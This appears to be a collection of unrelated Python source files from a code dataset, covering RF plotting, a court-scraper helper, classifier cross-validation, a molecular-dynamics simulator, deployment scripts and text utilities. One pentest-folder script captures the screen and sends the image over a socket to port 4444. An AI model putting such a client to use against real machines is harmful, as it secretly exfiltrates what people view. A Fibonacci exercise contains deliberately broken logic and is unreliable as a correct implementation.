sets upper limit of colorbar, if None, will be set to\n 3*mean of the magnitude of the complex difference.\n Default is None.\n vs_time: Boolean, optional.\n if True, then we assume each Network.name was made with\n rf.now_string, and we make the y-axis a datetime axis.\n Default is False.\n cbar_label: String or None, optional\n label for the colorbar. Default is None\n \\*args,\\*\\*kw : arguments, keyword arguments\n passed to :func:`~pylab.imshow`\n \"\"\"\n\n mat = npy.array([self[k].__getattribute__(component)[:, m, n] \\\n for k in range(len(self))])\n\n # if vmax is None:\n # vmax = 3*mat.mean()\n\n if vs_time:\n # create a datetime index\n dt_idx = [now_string_2_dt(k.name) for k in self]\n mpl_times = date2num(dt_idx)\n y_max = mpl_times[0]\n y_min = mpl_times[-1]\n\n else:\n y_min = len(self)\n y_max = 0\n\n # creates x and y scales\n freq = self[0].frequency\n extent = [freq.f_scaled[0], freq.f_scaled[-1], y_min, y_max]\n\n # set default imshow kwargs\n kw = {'extent': extent, 'aspect': 'auto', 'interpolation': 'nearest',\n 'vmax': vmax}\n # update the users kwargs\n kw.update(kwargs)\n img = plt.imshow(mat, *args, **kw)\n\n if vs_time:\n ax = plt.gca()\n ax.yaxis_date()\n # date_format = plt.DateFormatter('%M:%S.%f')\n # ax.yaxis.set_major_formatter(date_format)\n # cbar.set_label('Magnitude (dB)')\n plt.ylabel('Time')\n else:\n plt.ylabel('Network #')\n\n plt.grid(0)\n freq.labelXAxis()\n\n cbar = plt.colorbar()\n if cbar_label is not None:\n cbar.set_label(cbar_label)\n\n return img\n\ndef plot_circuit_graph(self, **kwargs):\n \"\"\"\n Plot the graph of the circuit using networkx drawing capabilities.\n\n Customisation options with default values:\n ::\n 'network_shape': 's'\n 'network_color': 'gray'\n 'network_size', 300\n 'network_fontsize': 7\n 'inter_shape': 'o'\n 'inter_color': 'lightblue'\n 'inter_size', 300\n 'port_shape': '>'\n 'port_color': 'red'\n 'port_size', 300\n 'port_fontsize': 7\n 'edges_fontsize': 5\n 'network_labels': False\n 'edge_labels': False\n 'inter_labels': False\n 'port_labels': False\n 'label_shift_x': 0\n 'label_shift_y': 0\n\n \"\"\"\n # Get the circuit graph. Will raise an error if the networkx package\n # is not installed.\n G = self.G\n\n # default values\n network_labels = kwargs.pop('network_labels', False)\n network_shape = kwargs.pop('network_shape', 's')\n network_color = kwargs.pop('network_color', 'gray')\n network_fontsize = kwargs.pop('network_fontsize', 7)\n network_size = kwargs.pop('network_size', 300)\n inter_labels = kwargs.pop('inter_labels', False)\n inter_shape = kwargs.pop('inter_shape', 'o')\n inter_color = kwargs.pop('inter_color', 'lightblue')\n inter_size = kwargs.pop('inter_size', 300)\n port_labels = kwargs.pop('port_labels', False)\n port_shape = kwargs.pop('port_shape', '>')\n port_color = kwargs.pop('port_color', 'red')\n port_size = kwargs.pop('port_size', 300)\n port_fontsize = kwargs.pop('port_fontsize', 7)\n edge_labels = kwargs.pop('edge_labels', False)\n edge_fontsize = kwargs.pop('edge_fontsize', 5)\n label_shift_x = kwargs.pop('label_shift_x', 0)\n label_shift_y = kwargs.pop('label_shift_y', 0)\n\n\n # sort between network nodes and port nodes\n all_ntw_names = [ntw.name for ntw in self.networks_list()]\n port_names = [ntw_name for ntw_name in all_ntw_names if 'port' in ntw_name]\n ntw_names = [ntw_name for ntw_name in all_ntw_names if 'port' not in ntw_name]\n # generate connecting nodes names\n int_names = ['X'+str(k) for k in range(self.connections_nb)]\n\n fig, ax = plt.subplots(figsize=(10,8))\n\n pos = nx.spring_layout(G)\n\n # draw Networks\n nx.draw_networkx_nodes(G, pos, port_names, ax=ax,\n node_size=port_size,\n node_color=port_color, node_shape=port_shape)\n nx.draw_networkx_nodes(G, pos, ntw_names, ax=ax,\n node_size=network_size,\n node_color=network_color, node_shape=network_shape)\n # draw intersections\n nx.draw_networkx_nodes(G, pos, int_names, ax=ax,\n node_size=inter_size,\n node_color=inter_color, node_shape=inter_shape)\n # labels shifts\n pos_labels = {}\n for node, coords in pos.items():\n pos_labels[node] = (coords[0] + label_shift_x,\n coords[1] + label_shift_y)\n\n # network labels\n if network_labels:\n network_labels = {lab:lab for lab in ntw_names}\n\n nx.draw_networkx_labels(G, pos_labels, labels=network_labels,\n font_size=network_fontsize, ax=ax)\n\n # intersection labels\n if inter_labels:\n inter_labels = {'X'+str(k):'X'+str(k) for k in range(self.connections_nb)}\n\n nx.draw_networkx_labels(G, pos_labels, labels=inter_labels,\n font_size=network_fontsize, ax=ax)\n\n # port labels\n if port_labels:\n port_labels = {lab:lab for lab in port_names}\n\n nx.draw_networkx_labels(G, pos_labels, labels=port_labels,\n font_size=port_fontsize, ax=ax)\n\n # draw edges\n nx.draw_networkx_edges(G, pos, ax=ax)\n if edge_labels:\n edge_labels = self.edge_labels\n nx.draw_networkx_edge_labels(G, pos,\n edge_labels=edge_labels, label_pos=0.5,\n font_size=edge_fontsize, ax=ax)\n # remove x and y axis and labels\n plt.axis('off')\n plt.tight_layout()\n\n\ndef plot_contour(freq: frequency.Frequency,\n x: NumberLike, y: NumberLike, z: NumberLike,\n min0max1: int, graph: bool = True,\n cmap: str = 'plasma_r', title: str = '',\n **kwargs):\n r\"\"\"\n Create a contour plot.\n\n Parameters\n ----------\n freq : :skrf.Frequency:\n Frequency object.\n x : array\n x points\n y : array\n y points.\n z : array\n z points.\n min0max1 : int\n 0 for min, 1 for max.\n graph : bool, optional\n plot graph if True. The default is True.\n cmap : str, optional\n Colormap label. The default is 'plasma_r'.\n title : str, optional\n Figure title. The default is ''.\n \\*\\*kwargs : dict\n Other parameters passed to `matplotlib.plot()`.\n\n Returns\n -------\n GAMopt : :skrf.Network:\n Network\n VALopt : float\n min or max.\n\n \"\"\"\n ri = npy.linspace(0,1, 50)\n ti = npy.linspace(0,2*npy.pi, 150)\n Ri , Ti = npy.meshgrid(ri, ti)\n xi = npy.linspace(-1,1, 50)\n Xi, Yi = npy.meshgrid(xi, xi)\n triang = tri.Triangulation(x, y)\n interpolator = tri.LinearTriInterpolator(triang, z)\n Zi = interpolator(Xi, Yi)\n if min0max1 == 1 :\n VALopt = npy.max(z)\n else :\n VALopt = npy.min(z)\n GAMopt = network.Network(f=[freq], s=x[z==VALopt] +1j*y[z==VALopt])\n\n if graph :\n fig, ax = plt.subplots(**kwargs)\n an = npy.linspace(0, 2*npy.pi, 50)\n cs, sn = npy.cos(an), npy.sin(an)\n plt.plot(cs, sn, color='k', lw=0.25)\n plt.plot(cs, sn*0, color='g', lw=0.25)\n plt.plot((1+cs)/2, sn/2, color='k', lw=0.25)\n plt.axis('equal')\n ax.set_axis_off()\n ax.contour(Xi, Yi, Zi, levels=20, vmin=Zi.min(), vmax= Zi.max(), linewidths=0.5, colors='k')\n cntr1 = ax.contourf(Xi, Yi, Zi, levels=20, vmin=Zi.min(), vmax= Zi.max(),cmap=cmap)\n fig.colorbar(cntr1, ax=ax)\n ax.plot(x, y, 'o', ms=0.3, color='k')\n ax.set(xlim=(-1, 1), ylim=(-1, 1))\n plt.title(title)\n plt.show()\n return GAMopt, VALopt\n","sub_path":"skrf/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":80076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"343169236","text":"import csv\nimport io\nimport pkgutil\n\n\nclass SitesMeta:\n\n def __init__(self):\n self.data = self._get_sites_data()\n\n def get(self, place_id):\n state = place_id[:2]\n county = place_id[3:].replace('_', ' ')\n key = (state, county)\n return self.data[key]\n\n def get_url(self, state=None, county=None):\n key = (state, county)\n return self.data[key]['home_url']\n\n def _get_sites_data(self):\n try:\n return self._data\n except AttributeError:\n text = self._get_sites_csv_text()\n reader = csv.DictReader(\n io.StringIO(text)\n )\n data = {}\n for row in reader:\n state = row.pop('state')\n county = row.pop('county')\n key = (state, county)\n data[key] = row\n self._data = data\n return self._data\n\n def _get_sites_csv_text(self):\n return pkgutil.get_data(\n __name__,\n 'data/sites_meta.csv'\n ).decode('utf-8')\n","sub_path":"court_scraper/sites_meta.py","file_name":"sites_meta.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"590457910","text":"from numpy.lib.function_base import average\nimport pandas as pd\nimport numpy as np\n\nfrom modelos.classificador_bayesiano_parzen import ClassificadorBayesianoParzen\nfrom modelos.classificador_bayesiano import ClassificadorBayesiano\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import RepeatedStratifiedKFold\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nfrom statistics import mode\nimport time\nfrom utils import utils\nfrom configuracoes import conf\nfrom imblearn.over_sampling import SMOTE\n\nstart_time = time.time()\n\n# Importando a base de dados\ndados = utils.get_base_de_dados()\n\n# Rótulo da coluna com as classes\nclasses = conf.ROTULOS_ATRIBUTOS[len(conf.ROTULOS_ATRIBUTOS)-1]\ny = dados[classes]\ny = dados['SEQUENCE NAME']\n\nx = dados.drop([classes], axis=1)\n\n# Descomentar para realizar a validação cruzada com normalização\n#x = utils.normalizar_dados(x)\n\n# Descomentar para realizar a validação cruzada sem o atributo com correlação significativa\n#x = x.drop('GVH', axis=1)\n\n\ndef hyperparameter_tuning(model, x_train, y_train, x_valid, y_valid, hyper_set):\n\n n = len(hyper_set)\n rs = np.zeros((n,4))\n\n if model == 'KNN':\n for i in range(n):\n k = hyper_set[i]\n clf = KNeighborsClassifier(n_neighbors = k).fit(x_train, y_train)\n pred = clf.predict(x_valid)\n\n rs[i,0] = accuracy_score(y_valid, pred)\n rs[i,1] = precision_score(y_valid, pred, average = 'macro' )\n rs[i,2] = recall_score(y_valid, pred, average = 'macro')\n rs[i,3] = f1_score(y_valid, pred, average = 'macro')\n elif model == 'PARZEN':\n for i in range(n):\n h = hyper_set[i]\n clf = ClassificadorBayesianoParzen(h = h).fit(x_train, y_train)\n pred = clf.predict(x_valid)\n\n rs[i,0] = accuracy_score(y_valid, pred)\n rs[i,1] = precision_score(y_valid, pred, average = 'macro' )\n rs[i,2] = recall_score(y_valid, pred, average = 'macro')\n rs[i,3] = f1_score(y_valid, pred, average = 'macro')\n else:\n return('Error: choose another classifier')\n\n idm = rs.argmax(axis = 0)\n id_best = mode(idm)\n return hyper_set[id_best]\n\n\ner_matrix = pd.DataFrame(np.zeros((50,5)),columns = ['knn', 'parzen','bayesian','logistic','ensemble']) # Error classification \nprc_matrix = pd.DataFrame(np.zeros((50,5)),columns = ['knn', 'parzen','bayesian','logistic','ensemble']) # precision\nrcl_matrix = pd.DataFrame(np.zeros((50,5)),columns = ['knn', 'parzen','bayesian','logistic','ensemble']) # recall\nfms_matrix = pd.DataFrame(np.zeros((50,5)),columns = ['knn', 'parzen','bayesian','logistic','ensemble']) # fmeaseure\n\n# Set of hyperparameters for tuning\nkset = np.arange(1,38,2)\nhset = np.linspace(0.001, 1, num=19)\n\nbest_hyper = pd.DataFrame(np.zeros((50,2)), columns=['k','h'])\n\nrkf = RepeatedStratifiedKFold(n_splits = 5, n_repeats = 10, random_state=2601)\ni = 0\nfor train_index, test_index in rkf.split(x,y):\n\n x_train, x_test = x.iloc[train_index], x.iloc[test_index]\n y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n \n # Descomentar para realizar o balanceamento das classes, pela classe minoritária\n #smote = SMOTE(k_neighbors=2, sampling_strategy='minority')\n #x_train, y_train = smote.fit_resample(x_train, y_train)\n\n ### tuning of parameters for KNN and Parzen\n x_treino, x_valid , y_treino, y_valid = train_test_split(x_train,y_train,test_size=0.20, \n random_state = 2601 + i, shuffle = True, stratify = y_train)\n k_best = hyperparameter_tuning('KNN', x_treino, y_treino, x_valid, y_valid, kset ) # KNN\n h_best = hyperparameter_tuning('PARZEN', x_treino, y_treino, x_valid, y_valid, hset ) # PARZEN\n best_hyper.iloc[i,0] = k_best\n best_hyper.iloc[i,1] = h_best\n\n\n # KNN\n knn_clf = KNeighborsClassifier(n_neighbors = k_best)\n knn = knn_clf.fit(x_train, y_train)\n pred_knn = knn.predict(x_test)\n er_matrix.iloc[i,0] = 1 - accuracy_score(y_test, pred_knn)\n prc_matrix.iloc[i,0] = precision_score(y_test, pred_knn, average = 'macro' )\n rcl_matrix.iloc[i,0] = recall_score(y_test, pred_knn, average = 'macro')\n fms_matrix.iloc[i,0] = f1_score(y_test, pred_knn, average = 'macro')\n\n # Parzen\n prz_clf = ClassificadorBayesianoParzen(h = h_best)\n prz = prz_clf.fit(x_train, y_train)\n pred_prz = prz.predict(x_test)\n er_matrix.iloc[i,1] = 1 - accuracy_score(y_test, pred_prz)\n prc_matrix.iloc[i,1] = precision_score(y_test, pred_prz, average = 'macro' )\n rcl_matrix.iloc[i,1] = recall_score(y_test, pred_prz, average = 'macro')\n fms_matrix.iloc[i,1] = f1_score(y_test, pred_prz, average = 'macro')\n\n # Bayesian Classifier\n bys_clf = ClassificadorBayesiano()\n bys = bys_clf.fit(x_train, y_train)\n pred_bys = bys.predict(x_test)\n er_matrix.iloc[i,2] = 1 - accuracy_score(y_test, pred_bys)\n prc_matrix.iloc[i,2] = precision_score(y_test, pred_bys, average = 'macro' )\n rcl_matrix.iloc[i,2] = recall_score(y_test, pred_bys, average = 'macro')\n fms_matrix.iloc[i,2] = f1_score(y_test, pred_bys, average = 'macro')\n\n # logistic regression\n lgr_clf = LogisticRegression(multi_class = 'ovr')\n lgr = lgr_clf.fit(x_train, y_train)\n pred_lgr = lgr.predict(x_test)\n er_matrix.iloc[i,3] = 1 - accuracy_score(y_test, pred_lgr)\n prc_matrix.iloc[i,3] = precision_score(y_test, pred_lgr, average = 'macro' )\n rcl_matrix.iloc[i,3] = recall_score(y_test, pred_lgr, average = 'macro')\n fms_matrix.iloc[i,3] = f1_score(y_test, pred_lgr, average = 'macro')\n\n # ensemble\n ens = VotingClassifier(estimators = [('knn',knn_clf), ('parzen',prz_clf), ('bayesian', bys_clf), ('logistic',lgr_clf)], voting ='hard').fit(x_train, y_train)\n pred_ens = ens.predict(x_test)\n er_matrix.iloc[i,4] = 1 - accuracy_score(y_test, pred_ens)\n prc_matrix.iloc[i,4] = precision_score(y_test, pred_ens, average = 'macro' )\n rcl_matrix.iloc[i,4] = recall_score(y_test, pred_ens, average = 'macro')\n fms_matrix.iloc[i,4] = f1_score(y_test, pred_ens, average = 'macro')\n\n print(i)\n i += 1\ner_matrix.to_csv('error_classification_normalized_only.csv',header = True, index = False)\nprc_matrix.to_csv('precision_normalized_only.csv',header = True, index = False)\nrcl_matrix.to_csv('recall_normalized_only.csv',header = True, index = False) \nfms_matrix.to_csv('fmeasure_normalized_only.csv',header = True, index = False) \nbest_hyper.to_csv('best_hyper_normalized_only.csv', header = True, index = False)\n\nprint(\" %.2f seconds \" % ( time.time() - start_time ) )","sub_path":"supervisionado/comparacao/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309402428","text":"# __author__ = ‘penny‘\n#-*-coding:utf-8-*-\n\nfrom selenium import webdriver\nimport os,time,HTMLTestRunner\n\n#截图函数\ndef insert_img(driver, file_name):\n base_dir = os.path.dirname(os.path.dirname(__file__))\n base_dir = str(base_dir)\n base_dir = base_dir.replace('\\\\','/')\n base = base_dir.split('src')[0]\n file_path = base + \"report/image/\" + file_name\n driver.get_screenshot_as_file(file_path)\n\n\n#获得项目路径函数\ndef project_path():\n base_dir = os.path.dirname(__file__)\n base_dir = str(base_dir)\n base_dir = base_dir.replace('\\\\','/')\n base = base_dir.split('src')[0]\n print(base)\n return base\n\n\n\nif __name__ == '__main__':\n driver = webdriver.Chrome()\n driver.get(\"http://www.baidu.com\")\n insert_img(driver,'baidu.jpg')\n driver.quit()","sub_path":"src/test/common/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"196279081","text":"#Ah, dear niblets, here we are again. What, don't like that name either? You people are impossible to please.\r\n#I'll turn you over by the end of this, or my name isn't Quentinius Arvid Ulf Twaxtletus. Here, take your problem.\r\n#The Fibonacci series prints numbers as the sum of the preceding two digits, beginning in whole numbers. Much like me last night.\r\n#Remember, whole numbers. If the numbers are natural, and don't have wholes in them, they're not the Fibonacci series.\r\nnum = int(input(\"Enter number of digits you want in series (minimum 3): \"))\r\nfirst = 1\r\nsecond = 2 \r\nprint(\"\\nFibonacci series is:\")\r\nprint(\"{0}, {1}\".format(first, second), end = \", \")\r\nfor i in range(num):\r\n\tnext = first + second\r\n\tif i != num-1:\r\n\t\tprint(next, end=\", \")\r\n\t\tnext = next - 1\r\n\telse:\r\n\t\tprint(next)\r\n\tfirst = second - 1\r\n\tsecond = next","sub_path":"Programs/Round-Logical/Program 2 - Python.py","file_name":"Program 2 - Python.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"187061095","text":"from cherrypy import wsgiserver\n#This can be from cherrypy import wsgiserver if you're not running it standalone.\nimport os\nimport django.core.handlers.wsgi\n\nif __name__ == \"__main__\":\n os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'\n server = wsgiserver.CherryPyWSGIServer(\n ('0.0.0.0', 7000),\n django.core.handlers.wsgi.WSGIHandler(),\n server_name = 'localhost',\n numthreads = 50,\n )\n server.nodelay = False # socket.TCP_NODELAY is not supported in jyhont 2.5.2\n try:\n server.start()\n except KeyboardInterrupt:\n server.stop()\n","sub_path":"src/tweet_site/cherry.py","file_name":"cherry.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"604476470","text":"from fabric.api import sudo\n\nfrom . import system\nfrom .task import Task\n\n\n__all__ = ['add_ppa', 'install']\n\n\nclass AddPpa(Task):\n def do(self):\n if self.conf.os in ['lucid', 'maverick', 'natty']:\n sudo('add-apt-repository ppa:rwky/redis')\n system.aptitude_update.run(force=True)\n\nadd_ppa = AddPpa()\n\n\nclass Install(Task):\n def do(self):\n system.aptitude_install.run(packages='redis-server')\n\ninstall = Install()\n","sub_path":"fabdeploy/redis.py","file_name":"redis.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"250722298","text":"from socket import *\nimport pyautogui\n\ns = socket(2,1)\ns.connect((\"127.0.0.1\",4444))\nprint(\"connected\")\n\nscreenshot = pyautogui.screenshot()\nscreenshot.save(\"screen.png\")\n\nf = open(\"screen.png\",\"rb\")\ndata = memoryview(f.read())\ns.send(str(len(data)).encode())\nprint(s.recv(1024))\ns.send(data)\nf.close()\n\ns.close()\n","sub_path":"Pentest and Network/Socket/screenshot/screenshot_client.py","file_name":"screenshot_client.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"346387672","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport sys\nsys.path.append('../Esoinn')\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial.distance import pdist,squareform\nfrom parmed.amber import AmberParm\nfrom parmed.amber import AmberMdcrd\nfrom parmed.amber import Rst7\nimport random\nimport pickle\nfrom multiprocessing import Queue,Process \nfrom .Thermostat import * \nfrom .analysis import * \nfrom ..Comparm import *\n\nclass Simulation():\n def __init__(self,sys,MD_setting):\n self.name=MD_setting.Name \n self.sys=sys\n self.path='./'+MD_setting.Name+'/' \n self.format=MD_setting.Mdformat\n self.T=MD_setting.Temp\n self.maxstep=MD_setting.Mdmaxsteps\n self.dt=MD_setting.Mddt\n self.icap=MD_setting.Icap\n self.ibox=MD_setting.Ibox\n self.box=MD_setting.Box \n self.center=MD_setting.Center \n self.radius=MD_setting.Capradius \n self.fcap=MD_setting.Capf\n self.MODE=MD_setting.Mode \n self.MDThermostat=MD_setting.Thermostat \n self.MDV0=MD_setting.Mdv0 \n self.stageindex=MD_setting.Stageindex\n self.Outfile=open(self.path+MD_setting.Name+'_%d.mdout'%self.stageindex,'w')\n self.Respfile=open(self.path+MD_setting.Name+'_%d.resp'%self.stageindex,'w')\n self.Nprint=MD_setting.Nprint\n return\n\n def MD(self,QMQueue=None):\n self.sys.Create_DisMap()\n self.sys.Update_DisMap()\n self.sys.update_crd()\n f,e,AVG_ERR,ERROR_mols,EGCMlist,chargestr=self.sys.Cal_EFQ()\n self.EPot0=e\n self.EPot=e\n self.EnergyStat=OnlineEstimator(self.EPot0) \n self.RealPot=0.0\n self.t=0.0\n self.KE=0.0\n self.atoms=self.sys.atoms\n self.m=np.array(list(map(lambda x:ATOMICMASSES[x-1],self.atoms)))\n self.x=self.sys.coords-self.sys.coords[self.center]\n self.v=np.zeros(self.x.shape)\n self.a=np.zeros(self.x.shape)\n self.f=f\n self.md_log=None\n if self.format==\"Amber\":\n self.trajectory=AmberMdcrd(self.path+self.name+'_%d.mdcrd'%self.stageindex,natom=self.sys.natom,hasbox=False,mode='w')\n self.restart=Rst7(natom=len(self.atoms))\n self.trajectory.add_coordinates(self.x)\n\n if self.MDV0==\"Random\":\n np.random.seed()\n self.v=np.random.randn(*self.x.shape)\n Tstat = Thermostat(self.m, self.v,self.T,self.dt)\n elif self.MDV0==\"Thermal\":\n self.v = np.random.normal(size=self.x.shape) * np.sqrt(1.38064852e-23 * self.T / self.m)[:,None]\n\n self.Tstat = None\n if (self.MDThermostat==\"Rescaling\"):\n self.Tstat = Thermo(self.m,self.v,self.T,self.dt)\n elif (self.MDThermostat==\"Andersen\"):\n self.Tstat = Andersen(self.m,self.v,self.T,self.dt)\n\n self.a=pow(10.0,-10.0)*np.einsum(\"ax,a->ax\", self.f, 1.0/self.m)\n if self.format==\"Amber\":\n self.restart.coordinates=self.x\n self.restart.vels=self.v\n \n step=0\n self.md_log=np.zeros((self.maxstep+1,7))\n res_order=np.array(range(1,self.sys.nres))\n ERROR=0\n ERROR_record=[]\n method_record=0\n Temp_record=[]\n MD_Flag=True\n while step < self.maxstep and MD_Flag:\n self.t+=self.dt\n t1=time.time()\n x_new=self.x+self.v*self.dt+0.5*self.a*self.dt**2\n #if self.icap==True:\n # x_new=x_new-x_new[self.center]\n self.sys.coords=x_new\n f=x_new;EPot=0;ERROR_mols=[]\n self.sys.Update_DisMap()\n self.sys.update_crd()\n f,EPot,ERROR,ERROR_mols,EGCMlist,chargestr=self.sys.Cal_EFQ()\n ERROR_record.append(ERROR)\n if self.sys.stepmethod=='Gaussian' and self.sys.Theroylevel=='NN':\n method_record+=1\n \n if self.MODE=='Train':\n if QMQueue!=None:\n QMQueue.put(ERROR_mols)\n self.EPot=EPot\n distozero=np.sqrt(np.sum(self.sys.coords**2,axis=1))\n if self.icap==True:\n #Vec=(self.sys.Distance_Matrix[self.center]-self.radius)/self.radius\n Vec=(distozero-self.radius)/self.radius\n for i in range(len(x_new)):\n if Vec[i]>0:\n tmpvec=(x_new[i])\n tmpvec=tmpvec/np.sqrt(np.sum(tmpvec**2))\n f[i]=f[i]-tmpvec*self.fcap*Vec[i]*JOULEPERHARTREE/627.51\n f[self.center]=f[self.center]-x_new[self.center]*10*Vec[self.center]*JOULEPERHARTREE/627.51\n a_new=pow(10.0,-10.0)*np.einsum(\"ax,a->ax\", f, 1.0/self.m)\n v_new=self.v+0.5*(self.a+a_new)*self.dt\n if self.MDThermostat!=None and step%1==0:\n v_new=self.Tstat.step(self.m,v_new,self.dt)\n self.a=a_new\n self.v=v_new\n self.x=x_new\n self.f=f\n self.md_log[step,0]=self.t\n self.md_log[step,4]=self.KE\n self.md_log[step,5]=self.EPot\n self.md_log[step,6]=self.KE+(self.EPot-self.EPot0)*JOULEPERHARTREE\n avE,Evar=self.EnergyStat(self.EPot)\n self.KE= KineticEnergy(self.v,self.m)\n Teff = (2./3.)*self.KE/IDEALGASR\n Temp_record.append(Teff)\n \n if (step%50==0 ):\n if self.format==\"Amber\":\n self.trajectory.add_coordinates(self.x)\n step+=1\n AVG_ERR=np.mean(np.array(ERROR_record[-1000:-1]))\n AVG_TEMP=np.mean(np.array(Temp_record[-1000:-1]))\n #if AVG_ERR>GPARAMS.Train_setting.rmse**2*GPARAMS.Train_setting.Modelnumperpoint*4:\n # MD_Flag=False\n #if method_record>2:\n # MD_Flag=False \n if AVG_TEMP>350:\n MD_Flag=False\n if (step%self.Nprint==0 ):\n if self.format==\"Amber\":\n if MD_Flag:\n self.restart.coordinates=self.x\n self.restart.vels=self.v\n self.restart.write(self.path+self.name+'_%d.rst7'%self.stageindex)\n self.steprecord=step\n else:\n file=open('%straj%d.trajin'%(self.path,self.stageindex),'w')\n file.write('trajin %s %d %d 1\\n'%(self.name+'_%d.mdcrd'%self.stageindex,0,math.ceil(self.steprecord,10)))\n file.write('trajout %s\\n' %(self.name+'_%d.mdcrd'%self.stageindex))\n os.system(\"cd %s && cpptraj -p %s < traj%d.trajin > traj%d.out && cd ..\"%(self.path,self.name+'.prmtop',self.stageindex,self.stageindex))\n if MD_Flag==True:\n self.Outfile.write(\"%s Step: %i time: %.1f(fs) KE(kJ): %.5f PotE(Eh): %.5f ETot(kJ/mol): %.5f Teff(K): %.5f MAX ERROR: %.3f Method: %s AVG_ERR: %f AVG_TEMP: %f \\n\"\\\n %(self.name, step, self.t, self.KE*len(self.m)/1000.0, self.EPot, self.KE*len(self.m)/1000.0+(self.EPot)*KJPERHARTREE, Teff,ERROR,self.sys.stepmethod,AVG_ERR,AVG_TEMP))\n self.Outfile.flush()\n self.Respfile.write(chargestr)\n self.Respfile.write(chargestr)\n else:\n self.Outfile.write(\"AVG ERR: %.3f , MD will stop~~!!\"%AVG_ERR)\n self.Outfile.flush()\n self.Outfile.close()\n self.Respfile.close()\n return \n\n","sub_path":"build/lib/ESOI_HDNN_MD/MD/MD.py","file_name":"MD.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452283092","text":"import numpy as np\r\nimport unicodedata\r\nimport datetime\r\n\r\nimport html2text\r\nfrom dateutil import parser\r\nimport dateparser\r\n\r\nimport torch\r\nimport re\r\n\r\nimport spacy\r\nnlp = spacy.load('en', disable=['parser', 'ner'])\r\n\r\ndef setseed(seed, opt):\r\n np.random.seed(seed)\r\n torch.manual_seed(seed)\r\n if opt['trainer']['cuda']:\r\n torch.cuda.manual_seed_all(seed)\r\n \r\ndef normalize_text(text):\r\n return unicodedata.normalize('NFD', text)\r\n\r\ndef html2text_(html):\r\n h = html2text.HTML2Text()\r\n h.ignore_links = True\r\n h.ignore_emphasis = True\r\n h.body_width = 0\r\n text = h.handle(html)\r\n text = text.strip('\\r\\n')\r\n return text\r\n \r\ndef text2words(opt, text):\r\n #this works better for imdb. not sure why quotes are not handled inconsistently by spacy\r\n text = text.replace('\"', ' ')\r\n \r\n doc = nlp(text)\r\n \r\n words = [w for w in doc if not w.is_space and not w.is_bracket and not w.is_punct]\r\n if opt['dataset']['text_pp_remove_stop_words']:\r\n words = [w for w in words if not w.is_stop ]\r\n \r\n if opt['dataset']['text_pp_lemmatization']:\r\n words = [w.lemma_ if w.lemma_ != '-PRON-' else w.lower_ for w in words]\r\n else:\r\n words = [w.lower_ for w in words]\r\n \r\n words = [normalize_text(w) for w in words]\r\n return words\r\n\r\ndef cleanup_punctuation(text):\r\n doc = nlp(text)\r\n words = [w for w in doc if not w.is_space and not w.is_bracket and not w.is_punct]\r\n words = [w.lower_ for w in words]\r\n return ' '.join(words)\r\n\r\n#build or extend vocabulary\r\ndef build_vocabulary(documents, vocabulary=None, glove_vocabulary=None):\r\n if vocabulary is None:\r\n vocabulary = {'words': {'': {'count': 0, 'id': 0}, '': {'count': 0, 'id': 1}}, 'ids': ['', ''], 'words_ignored': {}}\r\n\r\n for document in documents:\r\n for word in document:\r\n if word not in vocabulary['words']:\r\n if glove_vocabulary == None:\r\n vocabulary['words'][word] = {'count': 0, 'id': len(vocabulary['words'])}\r\n vocabulary['ids'].append(word)\r\n else:\r\n if word in glove_vocabulary:\r\n vocabulary['words'][word] = {'count': 0, 'id': len(vocabulary['words'])}\r\n vocabulary['ids'].append(word)\r\n if word in vocabulary['words']:\r\n vocabulary['words'][word]['count'] = vocabulary['words'][word]['count'] + 1\r\n else:\r\n if word not in vocabulary['words_ignored']:\r\n vocabulary['words_ignored'][word] = 0\r\n vocabulary['words_ignored'][word] += 1\r\n\r\n return vocabulary\r\n\r\ndef words2ids(opt, words, vocabulary):\r\n #word not in vocabulary if\r\n #a. test set\r\n #b. word not in glove\r\n #unknown can be\r\n #'ignore'\r\n #'unknown_id'\r\n #'fail'\r\n if opt['dataset']['word_embedding'] == 'fail':\r\n return [vocabulary['words'][word]['id'] for word in words]\r\n elif opt['dataset']['word_embedding'] == 'unknown_id':\r\n return [vocabulary['words'][word]['id'] if word in vocabulary['words'] else opt['dataset']['vocabulary_unknown_id'] for word in words]\r\n else:\r\n return [vocabulary['words'][word]['id'] for word in words if word in vocabulary['words']]\r\n \r\nELMO_PAD_CHAR = 260\r\nELMO_BOW_CHAR = 258\r\nELMO_EOW_CHAR = 259\r\n\r\n#ReceiptCNN.word_padded_len = 25\r\ndef Word2CharIds(word):\r\n chars = []\r\n if len(word) > 0:\r\n chars += [ELMO_BOW_CHAR]\r\n chars += list(word.encode('utf-8', errors='ignore'))\r\n chars += [ELMO_EOW_CHAR]\r\n \r\n if len(chars) > 25:\r\n chars = chars[:25]\r\n\r\n if len(chars) < 